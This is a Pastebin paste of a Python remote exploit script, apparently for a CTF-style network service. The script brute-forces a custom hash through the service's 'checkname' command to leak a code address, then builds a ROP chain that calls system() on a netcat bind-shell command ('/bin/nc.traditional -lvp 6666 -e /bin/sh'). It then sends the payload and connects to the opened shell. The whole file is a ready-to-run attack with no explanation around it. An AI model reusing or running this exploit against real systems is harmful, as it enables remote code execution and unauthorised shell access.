Guest User

Untitled

a guest
Jun 7th, 2014
361
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #
  3. # Template for remote TCP exploit code, generated by PEDA
  4. #
  5. import os
  6. import sys
  7. import struct
  8. import resource
  9. import time
  10.  
  11.  
  12. names = [
  13. 'AAAAAAAA0000FFC3', 'AAAAAAAA0000FFC1', 'AAAAAAAA0000FFB2', 'AAAAAAAA0000FFEF',
  14. 'AAAAAAAA0000FF88', 'AAAAAAAA0000FFB6', 'AAAAAAAA0000FF23', 'AAAAAAAA0000FFC7',
  15. 'AAAAAAAA0000FFF3', 'AAAAAAAA0000FF89', 'AAAAAAAA0000FDC9', 'AAAAAAAA0000FFEC',
  16. 'AAAAAAAA0000FF6B', 'AAAAAAAA0000FFD0', 'AAAAAAAA0000FF95', 'AAAAAAAA0000FFBA',
  17. 'AAAAAAAA0000FEF5', 'AAAAAAAA0000FFF5', 'AAAAAAAA0000FF6A', 'AAAAAAAA0000FF80',
  18. 'AAAAAAAA0000FF9D', 'AAAAAAAA0000FFD3', 'AAAAAAAA0000FFCE', 'AAAAAAAA0000FF09',
  19. 'AAAAAAAA0000FFC6', 'AAAAAAAA0000FF0D', 'AAAAAAAA0000FFE9', 'AAAAAAAA0000FF64',
  20. 'AAAAAAAA0000FFA2', 'AAAAAAAA0000FFCA', 'AAAAAAAA0000FF25', 'AAAAAAAA0000FF28',
  21. 'AAAAAAAA0000FF62', 'AAAAAAAA0000FF9C', 'AAAAAAAA0000FFFC', 'AAAAAAAA0000FFC0',
  22. 'AAAAAAAA0000FFA9', 'AAAAAAAA0000FFDC', 'AAAAAAAA0000FF45', 'AAAAAAAA0000FFDB',
  23. 'AAAAAAAA0000FF6C', 'AAAAAAAA0000FF7C', 'AAAAAAAA0000FDC3', 'AAAAAAAA0000FF71',
  24. 'AAAAAAAA0000FF4D', 'AAAAAAAA0000FFB3', 'AAAAAAAA0000FF38', 'AAAAAAAA0000FFD2',
  25. 'AAAAAAAA0000FEB7', 'AAAAAAAA0000FFF1', 'AAAAAAAA0000FFCB', 'AAAAAAAA0000FFB8',
  26. 'AAAAAAAA0000FF5B', 'AAAAAAAA0000FFFA', 'AAAAAAAA0000FFB4', 'AAAAAAAA0000FFFD',
  27. 'AAAAAAAA0000FFDA', 'AAAAAAAA0000FF9A', 'AAAAAAAA0000FF75', 'AAAAAAAA0000FDD7',
  28. 'AAAAAAAA0000FFB0', 'AAAAAAAA0000FFE6', 'AAAAAAAA0000FF6F', 'AAAAAAAA0000FFDE',
  29. 'AAAAAAAA0000FFE4', 'AAAAAAAA0000FF3D', 'AAAAAAAA0000FF98', 'AAAAAAAA0000FF74',
  30. 'AAAAAAAA0000FFF4', 'AAAAAAAA0000FE6A', 'AAAAAAAA0000FFD8', 'AAAAAAAA0000FF99',
  31. 'AAAAAAAA0000FF8F', 'AAAAAAAA0000FF82', 'AAAAAAAA0000FFE1', 'AAAAAAAA0000FF13',
  32. 'AAAAAAAA0000FF97', 'AAAAAAAA0000FD52', 'AAAAAAAA0000FFEA', 'AAAAAAAA0000FFCD',
  33. 'AAAAAAAA0000FFE3', 'AAAAAAAA0000FFCC', 'AAAAAAAA0000FF53', 'AAAAAAAA0000FE88',
  34. 'AAAAAAAA0000FFF2', 'AAAAAAAA0000FFFE', 'AAAAAAAA0000FF1F', 'AAAAAAAA0000FF73',
  35. 'AAAAAAAA0000FF66', 'AAAAAAAA0000FF83', 'AAAAAAAA0000FFD6', 'AAAAAAAA0000FF3A',
  36. 'AAAAAAAA0000FFF8', 'AAAAAAAA0000FE36', 'AAAAAAAA0000FFE8', 'AAAAAAAA0000FFE5',
  37. 'AAAAAAAA0000FFCF', 'AAAAAAAA0000FEA0', 'AAAAAAAA0000FFF6', 'AAAAAAAA0000FEE1',
  38. 'AAAAAAAA0000FFD9', 'AAAAAAAA0000FF5F', 'AAAAAAAA0000FF7A', 'AAAAAAAA0000FFE0',
  39. 'AAAAAAAA0000FFEB', 'AAAAAAAA0000FFC8', 'AAAAAAAA0000FFFB', 'AAAAAAAA0000FFF9',
  40. 'AAAAAAAA0000FF34', 'AAAAAAAA0000FFDF', 'AAAAAAAA0000FFF7', 'AAAAAAAA0000FFAA',
  41. 'AAAAAAAA0000FF50', 'AAAAAAAA0000FFD5', 'AAAAAAAA0000FD09', 'AAAAAAAA0000FFED',
  42. 'AAAAAAAA0000FFA0', 'AAAAAAAA0000FE93', 'AAAAAAAA0000FF8C', 'AAAAAAAA0000FDB6',
  43. 'AAAAAAAA0000FFF0', 'AAAAAAAA0000FEFD', 'AAAAAAAA0000FFEE', 'AAAAAAAA0000FF91',
  44. 'AAAAAAAA0000FE72', 'AAAAAAAA0000FF56', 'AAAAAAAA0000FFD7', 'AAAAAAAA0000FF4B']
  45.  
  46.  
  47. from socket import *
  48. import telnetlib
  49. class TCPClient():
  50.     def __init__(self, host, port, debug=0):
  51.         self.debug = debug
  52.         self.sock = socket(AF_INET, SOCK_STREAM)
  53.         self.sock.connect((host, port))
  54.  
  55.     def debug_log(self, size, data, cmd):
  56.         if self.debug != 0:
  57.             print "%s(%d): %s" % (cmd, size, repr(data))
  58.  
  59.     def send(self, data, delay=0):
  60.         if delay:
  61.             time.sleep(delay)
  62.         nsend = self.sock.send(data)
  63.         if self.debug > 1:
  64.             self.debug_log(nsend, data, "send")
  65.         return nsend
  66.  
  67.     def sendline(self, data, delay=0):
  68.         nsend = self.send(data + "\n", delay)
  69.         return nsend
  70.  
  71.     def recv(self, size=1024, delay=0):
  72.         if delay:
  73.             time.sleep(delay)
  74.         buf = self.sock.recv(size)
  75.         if self.debug > 0:
  76.             self.debug_log(len(buf), buf, "recv")
  77.         return buf
  78.  
  79.     def recv_until(self, delim):
  80.         buf = ""
  81.         while True:
  82.             c = self.sock.recv(1)
  83.             buf += c
  84.             if delim in buf:
  85.                 break
  86.         self.debug_log(len(buf), buf, "recv")
  87.         return buf
  88.  
  89.     def recvline(self):
  90.         buf = self.recv_until("\n")
  91.         return buf
  92.  
  93.     def close(self):
  94.         self.sock.close()
  95.  
  96. # ================================================================================
  97. def is_index(data):
  98.     return bool(data.count('not') == 0)
  99.  
  100. # ================================================================================
  101. def _hash(tohash):
  102.     h = 0xfee13117
  103.     for i in range(len(tohash)):
  104.         h ^= ord(tohash[i])
  105.         h = (h & 0xffffffff)
  106.         h += (h << 11)
  107.         h = (h & 0xffffffff)
  108.         h ^= (h >> 7)
  109.         h = (h & 0xffffffff)
  110.         h -= ord(tohash[i])
  111.         h = (h & 0xffffffff)
  112.  
  113.     h += (h << 3)
  114.     h = (h & 0xffffffff)
  115.     h ^= (h >> 10)
  116.     h = (h & 0xffffffff)
  117.     h += (h << 15)
  118.     h = (h & 0xffffffff)
  119.     h -= (h >> 17)
  120.     h = (h & 0xffffffff)
  121.  
  122.     return (h & 127)
  123.  
  124. # ================================================================================
  125. def hash_address(address):
  126.     return _hash('AAAABBBBCCCC' + struct.pack('<L', int(address,16)) + '\x04')
  127.  
  128. # ================================================================================
  129. def gen_dict(currlen, knownpart):
  130.     result = dict()
  131.     for i in range(256):
  132.         result[i] = _hash('AAAABBBBCCCC' + (3 - currlen) * 'D' + chr(i) + knownpart + '\x04')
  133.    
  134.     return result
  135.  
  136. # ================================================================================
  137. def get_hashbytes(key, gdict):
  138.     result = list()
  139.     for i in range(len(gdict)):
  140.         if gdict[i] == key:
  141.             result.append( hex(i) )
  142.    
  143.     return result
  144.  
  145. # ================================================================================
  146. def clean_list(l2, l3):
  147.     l2t = []
  148.     l3t = []
  149.     for i in range(len(l2)):
  150.         if len(l3[i]) != 0 and int(l2[i],16) != 0:
  151.             l2t.append( l2[i] )
  152.             l3t.append( l3[i] )
  153.  
  154.     return l2t, l3t
  155.  
  156. # ================================================================================
  157. def parse_hashes(keys):
  158.     kpart = ''
  159.  
  160.     l1 = get_hashbytes(keys[0], gen_dict(0, kpart))
  161.     kpart += chr( int(l1[0], 16))
  162.  
  163.     l2 = get_hashbytes(keys[1], gen_dict(1, kpart))
  164.  
  165.     l3 = list()
  166.     for i in range(len(l2)):
  167.         l3.append(get_hashbytes(keys[2], gen_dict(2, chr(int(l2[i],16))+kpart)))
  168.  
  169.     (l2, l3) = clean_list(l2, l3)
  170.  
  171.     # print 'l1:',l1
  172.     # print 'l2:',l2
  173.     # print 'l3:',l3
  174.  
  175.     md = dict()
  176.     r = dict()
  177.     for i in range(len(l2)):
  178.         md[ l2[i] ] = l3[i]
  179.     r[ l1[0] ] = md
  180.  
  181.     #print 'merged:', r
  182.  
  183.     cl = list()
  184.     for d1 in r:
  185.         for d2 in r[d1]:
  186.             for d3 in r[d1][d2]:
  187.                 addr = '0x%02x%02x%02x35' % (int(d1,16) , int(d2,16) , int(d3,16))
  188.                 cl.append( addr )
  189.                 #print addr
  190.     return cl
  191.  
  192. # ================================================================================
  193. def build_rop(baseaddress, leakaddress):
  194.     _dummy      = struct.pack('<L', 0x41414141)
  195.     popretn     = struct.pack('<L', baseaddress + 0x19bc) # pop ebx
  196.     _exit       = struct.pack('<L', (leakaddress+ 0xffe871ab) & 0xffffffff)
  197.     _system     = struct.pack('<L', (leakaddress+ 0xffe912eb) & 0xffffffff)
  198.     ncstr       = '/bin/nc.traditional -lvp 6666 -e /bin/sh'
  199.    
  200.     # build rop part to copy ncstr to 'registrations'
  201.     rop = popretn # pop ebx
  202.     for i in range(10):
  203.         rop += ncstr[(i*4) : (i*4) + 4]
  204.         rop += struct.pack('<L', baseaddress + 0x29b3) # mov edx ebx ; mov eax ecx ; pop ebx ;
  205.         rop += struct.pack('<L', baseaddress + 0x927c + (i * 4)) # address @ registrations
  206.         rop += struct.pack('<L', baseaddress + 0x44b8) # mov [ebx+0x4] edx ; pop ebx ;;
  207.     rop += _dummy   # dummy for the last pop ebx ..
  208.  
  209.     # build 'system and exit' stack frame
  210.     rop += _system  # libc_system
  211.     rop += popretn  # pop return to exit
  212.     rop += struct.pack('<L', baseaddress + 37504) # ptr to 'registrations'
  213.     rop += _exit
  214.     rop += _dummy
  215.     rop += struct.pack('<L', 0xffff1337) # exit code
  216.  
  217.     return rop
  218.  
  219. # ================================================================================
  220. def shell_client(host, port):
  221.     port = int(port)
  222.     client = TCPClient(host, port, debug=0)
  223.     try:
  224.         t = telnetlib.Telnet()
  225.         t.sock = client.sock
  226.         t.interact()
  227.         t.close()
  228.     except KeyboardInterrupt:
  229.         pass
  230.  
  231. # ================================================================================
  232. def exploit(host, port, delaytime, dontwait=True):
  233.     checkname117 = 10293
  234.     try:
  235.         byteindex = 0
  236.         hashes = list()
  237.  
  238.         port = int(port)
  239.         client = TCPClient(host, port, debug=0)
  240.         client.recvline()
  241.         print '[+] Bruteforcing checkname...'
  242.         while byteindex != 4:
  243.             for nameindex in range(128):
  244.                 client.sendline('addreg %s 64 1.1.1.1' % (names[nameindex]), delay=delaytime)
  245.                 client.sendline('isup h4x 1337', delay=delaytime)
  246.                 matchcount = 0
  247.                 for checkindex in range(4):
  248.                     client.sendline('checkname '+'AAAABBBBCCCC'.ljust(15 - byteindex, 'D'), delay=delaytime)
  249.                     r = client.recvline()
  250.                     # check every 2nd response
  251.                     if ((checkindex+1) % 2 == 0):
  252.                         if is_index(r.strip()):
  253.                             matchcount += 1
  254.                 client.sendline('addreg %s 0 0.0.0.0' % (names[nameindex]), delay=delaytime)
  255.                 if matchcount == 2:
  256.                     print '[+] Byte(%d) hash(%d) found' % (byteindex+1, nameindex)
  257.                     hashes.append( nameindex )
  258.                     byteindex += 1
  259.                     break
  260.  
  261.         client.sendline('quit', delay=delaytime)
  262.         client.close()
  263.         print '[+] Hashes: ' + ' '.join((str(h)) for h in hashes)
  264.  
  265.         addresses = parse_hashes(hashes)
  266.         baseaddress = 0
  267.         for address in addresses:
  268.             if hashes[3] == hash_address( address ):
  269.                 print '[+] Address checkname+117 => %s' % (address)
  270.                 baseaddress = (int(address, 16) - checkname117)
  271.                 break
  272.  
  273.         if baseaddress:
  274.             payload = 44 * 'A' + build_rop(baseaddress, int(address, 16))
  275.            
  276.             if not dontwait:
  277.                 raw_input("Press enter to expoit!")
  278.             print '[+] Sending exploit...'
  279.             port = int(port)
  280.             client = TCPClient(host, port, debug=0)
  281.             client.recvline()
  282.  
  283.             client.send('checkname ' + payload)
  284.            
  285.             client.sendline('quit', delay=delaytime)
  286.             client.close()
  287.  
  288.             if not dontwait:
  289.                 raw_input("Connect to shell?")
  290.  
  291.             print '[+] Connecting to shell...'
  292.             shell_client(host, '6666')
  293.  
  294.     except Exception as e:
  295.         print '[-] Error: %s' % (e)
  296.  
  297. if __name__ == "__main__":
  298.     if len(sys.argv) == 3:
  299.         exploit(sys.argv[1], sys.argv[2], 0.1)
RAW Paste Data